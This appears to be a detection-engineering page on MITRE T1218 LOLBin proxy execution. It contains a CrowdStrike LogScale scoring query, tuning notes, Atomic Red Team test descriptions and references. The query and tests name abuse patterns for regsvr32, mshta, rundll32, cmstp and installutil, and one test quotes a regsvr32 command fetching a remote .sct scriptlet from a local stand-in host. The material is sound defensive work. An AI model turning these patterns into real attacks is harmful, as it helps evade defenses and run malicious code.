Detect System Binary Proxy Execution in CrowdStrike LogScale
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. Several Microsoft-signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. Sub-techniques include abuse of mshta.exe, rundll32.exe, regsvr32.exe, msiexec.exe, cmstp.exe, installutil.exe, regsvcs.exe, regasm.exe, odbcconf.exe, verclsid.exe, mavinject.exe, control.exe (Control Panel), compiled HTML files (hh.exe), MMC snap-ins, Electron applications, and wuauclt.exe. On Linux, trusted binaries such as split may be abused similarly. Real-world usage includes Lazarus Group abusing wuauclt.exe to execute malicious DLLs and Volt Typhoon broadly leveraging LOLBins to maintain and expand network access.
MITRE ATT&CK
- Tactic
- Defense Evasion
- Technique
- T1218 System Binary Proxy Execution
- Canonical reference
- https://attack.mitre.org/techniques/T1218/
LogScale Detection Query
#event_simpleName=ProcessRollup2
| FileName = /(?i)^(mshta|rundll32|regsvr32|msiexec|cmstp|installutil|regsvcs|regasm|odbcconf|verclsid|mavinject|hh|wuauclt|mmc|xwizard|syncappvpublishingserver|appsyncpublishingserver)\.exe$/
| ParentBaseFileName = /(?i)^(winword|excel|powerpnt|outlook|onenote|msaccess|mspub|visio|wscript|cscript|mshta|cmd|powershell|pwsh|explorer)\.exe$/
OR CommandLine = /(?i)(http:\/\/|https:\/\/|ftp:\/\/)/
OR CommandLine = /(?i)(\.sct|\.hta|\.vbs|\.wsf|\.js|scrobj)/
OR (FileName = /(?i)^regsvr32\.exe$/ AND CommandLine = /(?i)(/s|/u|/i:|scrobj|sct)/)
OR (FileName = /(?i)^mshta\.exe$/ AND CommandLine = /(?i)(\.hta|javascript:|vbscript:)/)
OR (FileName = /(?i)^rundll32\.exe$/ AND CommandLine = /(?i)(javascript:|shell32\.dll|advpack\.dll|ieadvpack\.dll|syssetup\.dll)/)
OR (FileName = /(?i)^cmstp\.exe$/ AND CommandLine = /(?i)(/s|/ns|\.inf)/)
OR (FileName = /(?i)^installutil\.exe$/ AND CommandLine = /(?i)(/logfile=|/LogToConsole=|/U)/)
OR (FileName = /(?i)^wuauclt\.exe$/ AND CommandLine = /(?i)UpdateDeploymentProvider/)
OR (FileName = /(?i)^odbcconf\.exe$/ AND CommandLine = /(?i)(/a|-a|regsvr|\.rsp)/)
| eval IsOfficeParent = if(ParentBaseFileName = /(?i)^(winword|excel|powerpnt|outlook|onenote|msaccess|mspub|visio)\.exe$/, 1, 0)
| eval HasRemoteURL = if(CommandLine = /(?i)(http:\/\/|https:\/\/|ftp:\/\/)/, 1, 0)
| eval HasComScript = if(CommandLine = /(?i)(\.sct|\.hta|\.vbs|\.wsf|\.js|scrobj)/, 1, 0)
| eval RegSvr32Bypass = if(FileName = /(?i)^regsvr32\.exe$/ AND CommandLine = /(?i)(/s|/u|/i:|scrobj|sct)/, 1, 0)
| eval MshtaSus = if(FileName = /(?i)^mshta\.exe$/ AND CommandLine = /(?i)(\.hta|javascript:|vbscript:)/, 1, 0)
| eval RunDll32Sus = if(FileName = /(?i)^rundll32\.exe$/ AND CommandLine = /(?i)(javascript:|shell32\.dll|advpack\.dll|ieadvpack\.dll|syssetup\.dll)/, 1, 0)
| eval CMSTPInf = if(FileName = /(?i)^cmstp\.exe$/ AND CommandLine = /(?i)(/s|/ns|\.inf)/, 1, 0)
| eval InstallUtilBypass = if(FileName = /(?i)^installutil\.exe$/ AND CommandLine = /(?i)(/logfile=|/LogToConsole=|/U)/, 1, 0)
| eval WuaucltDll = if(FileName = /(?i)^wuauclt\.exe$/ AND CommandLine = /(?i)UpdateDeploymentProvider/, 1, 0)
| eval OdbcConfRSP = if(FileName = /(?i)^odbcconf\.exe$/ AND CommandLine = /(?i)(/a|-a|regsvr|\.rsp)/, 1, 0)
| eval SuspicionScore = IsOfficeParent + HasRemoteURL + HasComScript + RegSvr32Bypass + MshtaSus + RunDll32Sus + CMSTPInf + InstallUtilBypass + WuaucltDll + OdbcConfRSP
| where SuspicionScore > 0
| table([timestamp, ComputerName, UserName, FileName, CommandLine, ParentBaseFileName, ParentCommandLine, IsOfficeParent, HasRemoteURL, RegSvr32Bypass, MshtaSus, RunDll32Sus, CMSTPInf, InstallUtilBypass, WuaucltDll, OdbcConfRSP, SuspicionScore])
| sort(SuspicionScore, order=desc)CrowdStrike LogScale (Falcon) detection for T1218 LOLBin proxy execution using ProcessRollup2 events. Filters on known LOLBin filenames, then scores each event across multiple suspicion indicators including Office/script parent process ancestry, remote URL references, COM script extensions, and binary-specific technique patterns. Requires Falcon sensor process telemetry.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate software deployment systems using msiexec.exe or rundll32.exe invoked by management scripts running under powershell.exe or cmd.exe
- COM-based application frameworks that call regsvr32.exe or regasm.exe to register plugins during install or repair operations
- Security awareness or red team simulation tools running LOLBin atomic tests in a controlled environment without exclusions applied
Other platforms for T1218
Testing Methodology
Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Regsvr32 SCT Scriptlet Remote Execution
Expected signal: Sysmon Event ID 1: Process Create with Image=regsvr32.exe, CommandLine containing '/s /n /u /i:http://127.0.0.1:8080/payload.sct scrobj.dll'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8080 (connection will fail). Sysmon Event ID 7: Image Load for scrobj.dll from C:\Windows\System32.
- Test 2MSHTA Inline VBScript Execution
Expected signal: Sysmon Event ID 1: Process Create for mshta.exe with CommandLine containing 'vbscript:Execute'. Sysmon Event ID 1 child: cmd.exe spawned by mshta.exe. Sysmon Event ID 11: File creation of mshta_test.txt in %TEMP%.
- Test 3CMSTP INF File UAC Bypass and Execution
Expected signal: Sysmon Event ID 1: Process Create for cmstp.exe with CommandLine containing '/s' and path to .inf file. Sysmon Event ID 11: File creation for test.inf and cmstp_test.txt. Sysmon Event ID 1 child: cmd.exe spawned by cmstp.exe executing the RunPreSetupCommands action.
- Test 4InstallUtil CLR Bypass via /logfile Flag
Expected signal: Sysmon Event ID 1: Process Create for installutil.exe with CommandLine containing '/logfile=' and '/LogToConsole=false'. Sysmon Event ID 7: Image loads for CLR DLLs (clr.dll, mscorwks.dll). The command will fail against calc.exe (not a valid .NET assembly) but the process creation telemetry fires.
- Test 5Rundll32 JavaScript Execution
Expected signal: Sysmon Event ID 1: Process Create for rundll32.exe with CommandLine containing 'javascript:' and 'mshtml'. Sysmon Event ID 7: Image Load for mshtml.dll into rundll32.exe. Sysmon Event ID 1 child: cmd.exe spawned. Sysmon Event ID 11: File creation for rundll32_test.txt.
References (11)
- https://attack.mitre.org/techniques/T1218/
- https://github.com/LOLBAS-Project/LOLBAS
- https://gtfobins.github.io/gtfobins/split/
- https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference
- https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1218
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation
- https://posts.specterops.io/documenting-and-attacking-a-windows-defender-application-control-feature-the-hard-way-a-case-study-in-applocker-bypass-8e0a5b9c89a1
- https://www.mandiant.com/resources/blog/the-risks-of-bypassing-uac-with-cmstp
- https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
- https://attack.mitre.org/groups/G0032/
- https://www.cisa.gov/sites/default/files/2024-02/aa24-038a-prc-state-sponsored-actors-compromise-us-critical-infrastructure_0.pdf
Unlock Pro Content
Get the full detection package for T1218 including response playbook, investigation guide, and atomic red team tests.